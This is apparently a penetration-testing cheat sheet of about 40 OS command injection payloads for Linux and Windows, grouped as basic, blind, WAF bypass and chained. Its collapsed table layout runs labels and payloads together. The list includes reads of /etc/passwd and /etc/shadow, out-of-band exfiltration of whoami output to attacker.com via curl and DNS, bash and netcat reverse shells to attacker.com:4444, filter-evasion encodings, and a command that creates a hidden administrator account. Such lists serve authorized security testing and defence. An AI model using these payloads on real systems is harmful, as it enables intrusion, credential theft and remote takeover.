cmd-injection
40 command injection payloads — Linux, Windows, blind, WAF bypass. Authorized testing only.
; idLinuxLinux
; id| idLinuxLinux
| id|| idLinuxLinux
|| id& idLinuxLinux
& id&& idLinuxLinux
&& idbacktick idLinuxLinux
`id`$() subshellLinuxLinux
$(id); cat /etc/passwdLinuxLinux
; cat /etc/passwd; whoamiLinuxLinux
; whoami; uname -aLinuxLinux
; uname -a& whoamiWindowsWindows
& whoami| whoamiWindowsWindows
| whoami|| whoamiWindowsWindows
|| whoami&& whoamiWindowsWindows
&& whoami& ipconfigWindowsWindows
& ipconfig& type win.iniWindowsWindows
& type C:\Windows\win.inicmd /c whoamiWindowsWindows
; cmd /c whoamiPowerShell Get-ProcessWindowsWindows
& powershell -command Get-Processsleep 5BlindLinux
; sleep 5ping -c 5 127.0.0.1BlindLinux
; ping -c 5 127.0.0.1curl out-of-bandBlindLinux
; curl http://attacker.com/$(whoami)DNS exfilBlindLinux
; nslookup $(whoami).attacker.comping -n 5BlindWindows
& ping -n 5 127.0.0.1WAITFORBlindWindows
& WAITFOR /T 5 foo 2>nulIFS bypassWAF BypassLinux
${IFS}idⓘ uses $IFS instead of space
Brace expansionWAF BypassLinux
{id}ⓘ bash brace expansion
Newline separatorWAF BypassLinux
idⓘ %0a in URL-encoded context
Tab separatorWAF BypassLinux
idVariable in cmdWAF BypassLinux
i${z}dⓘ $z is empty, so this evaluates to id
Base64 evalWAF BypassLinux
$(echo aWQ= | base64 -d)Hex char evalWAF BypassLinux
$(printf '\x69\x64')ⓘ hex-encoded 'id'
Wildcard expandWAF BypassLinux
/???/i?ⓘ /bin/id via glob
URL encoded ;WAF BypassBoth
%3Bidⓘ URL-encoded semicolon
Double URL ;WAF BypassBoth
%253Bidⓘ double-encoded
id;ls /ChainedLinux
; id; ls /env dumpChainedLinux
; envRead shadowChainedLinux
; cat /etc/shadowReverse shell bashChainedLinux
; bash -i >& /dev/tcp/attacker.com/4444 0>&1Reverse shell mkfifoChainedLinux
; mkfifo /tmp/f; nc attacker.com 4444 </tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/fNet user addChainedWindows
& net user hacked P@ssw0rd /add & net localgroup Administrators hacked /add